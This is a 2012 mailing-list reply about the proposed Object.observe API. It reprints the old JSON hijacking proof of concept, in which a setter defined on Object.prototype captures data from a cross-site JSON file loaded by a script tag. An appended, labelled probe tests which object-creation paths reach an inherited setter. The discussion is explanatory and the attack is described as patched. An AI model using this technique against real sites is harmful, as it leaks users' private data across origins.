Experimental implementation of Object.observe & JS Utility library now available

gaz Heyes gazheyes at gmail.com
Fri Aug 17 06:21:33 PDT 2012


On 17 August 2012 13:47, Rafael Weinstein <rafaelw at chromium.org> wrote:

> Hi gaz,
>
> Thanks so much for your time.
>
> Much care has been taken with this proposal to ensure that it is
> neutral with respect to the existing JS Object/Security model.
>
> As I understand it, the core vulnerability with JSON hacking is the
> ability to define getters on the Object prototype. Object.observe()
> does not affect that ability.
>

The original attack I'm talking about is this:
// variant of the "I know what your friends did last summer" attack
// http://www.thespanner.co.uk/2009/01/07/i-know-what-your-friends-did-last-summer/
<script>
Object.defineProperty(Object.prototype, "x", {
 set:function(val){
   alert(val);
 }
});
</script>
<script src="//some.external.site/friends.json"></script>
<!-- friends.json contains [{"x":"stolen"}] -->

This was patched to prevent the setter being called on a new object literal
but I guess if the observable stuff doesn't account for this then it's a
problem. It seems like you account for this which is cool.
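
Added example, not part of the original message or of the Object.observe proposal: a check of the patched behaviour described above, run against whatever engine executes it. It goes slightly beyond the post by also probing `JSON.parse`, plain assignment and `Object.assign`; the function name and the sample values are constructed for illustration.

```javascript
// Reports which ways of creating or writing property "x" reach a setter
// that was defined on Object.prototype.
function probePrototypeSetter() {
  const seen = []; // every value the inherited setter receives
  Object.defineProperty(Object.prototype, "x", {
    configurable: true, // lets the finally block remove it again
    set(val) { seen.push(val); }
  });
  try {
    // Object literal, as in a JSON file evaluated as script: "x" is defined
    // as an own data property, so the inherited setter is bypassed.
    const literal = [{ "x": "from-literal" }];
    // JSON.parse builds its objects the same way.
    const parsed = JSON.parse('[{"x":"from-json-parse"}]');
    // Plain assignment walks the prototype chain and finds the setter.
    const assigned = {};
    assigned.x = "from-assignment";
    // Object.assign copies with assignment semantics, so it also reaches it.
    const merged = Object.assign({}, { "x": "from-object-assign" });

    const hasOwnX = (o) => Object.prototype.hasOwnProperty.call(o, "x");
    return {
      literalReachedSetter: seen.includes("from-literal"),
      jsonParseReachedSetter: seen.includes("from-json-parse"),
      assignmentReachedSetter: seen.includes("from-assignment"),
      objectAssignReachedSetter: seen.includes("from-object-assign"),
      literalHasOwnX: hasOwnX(literal[0]),
      parsedHasOwnX: hasOwnX(parsed[0]),
      assignedHasOwnX: hasOwnX(assigned),
      mergedHasOwnX: hasOwnX(merged)
    };
  } finally {
    delete Object.prototype.x; // restore the prototype for later code
  }
}

console.log(probePrototypeSetter());
```

On an ES5-conformant engine the literal and `JSON.parse` cases report `false` for reaching the setter, while the two assignment-based cases report `true`.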